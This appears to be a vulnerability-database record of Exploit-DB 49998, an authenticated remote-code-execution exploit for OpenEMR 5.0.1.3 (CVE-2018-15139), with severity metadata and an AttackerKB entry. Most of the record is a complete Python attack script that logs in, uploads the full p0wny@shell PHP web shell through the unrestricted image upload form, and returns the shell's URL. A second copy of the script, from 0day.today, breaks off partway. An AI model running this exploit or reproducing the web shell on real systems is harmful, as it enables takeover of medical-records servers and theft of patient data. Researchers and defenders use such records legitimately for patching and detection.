OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)

2021-06-14T00:00:00

Description

{"id": "EDB-ID:49998", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)", "description": "", "published": "2021-06-14T00:00:00", "modified": "2021-06-14T00:00:00", "epss": [{"cve": "CVE-2018-15139", "epss": 0.9102, "percentile": 0.98344, "modified": "2023-05-27"}], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49998", "reporter": "Ron Jost", "references": [], "cvelist": ["2018-15139", "CVE-2018-15139"], "immutableFields": [], "lastseen": "2023-05-27T14:39:06", "viewCount": 212, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139"]}, {"type": "exploitdb", "idList": ["EDB-ID:50122"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112356"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163110", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36407", "1337DAY-ID-36549"]}]}, "score": {"value": 8.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139"]}, {"type": "exploitdb", "idList": ["EDB-ID:50122"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112356"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163110", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36407", "1337DAY-ID-36549"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-15139", "epss": 0.9102, "percentile": 0.98332, "modified": "2023-05-07"}], "vulnersScore": 8.7}, "_state": {"dependencies": 1685211539, "score": 1685200094, "epss": 0}, "_internal": {"score_hash": "61a12360b4dc75895e133c6d5e80ba06"}, "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/49998.py", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Date 12.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____\n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ /\n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\\n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |\n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/\n |_|\n\n _____ _ _ _\n | ____|_ ___ __ | | ___ (_) |_\n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_\n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_|\n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"attackerkb": [{"lastseen": "2021-07-20T20:08:59", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:45pm UTC reported:\n\n * Title: OpenEMR < 5.0.1.4 \u2013 (Authenticated) File upload \u2013 Remote command execution \n\n * Vulnerable version: < 5.0.1.4 (it means up to 5.0.1.3) \n\n * Patch: <https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2018-15139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2020-06-05T00:00:00", "id": "AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17", "href": "https://attackerkb.com/topics/Bm7UPQNfBQ/cve-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-27T13:45:44", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-14T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "1337DAY-ID-36407", "href": "https://0day.today/exploit/description/36407", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____ \n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n |_| \n\n _____ _ _ _ \n | ____|_ ___ __ | | ___ (_) |_ \n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_ \n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_| \n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": 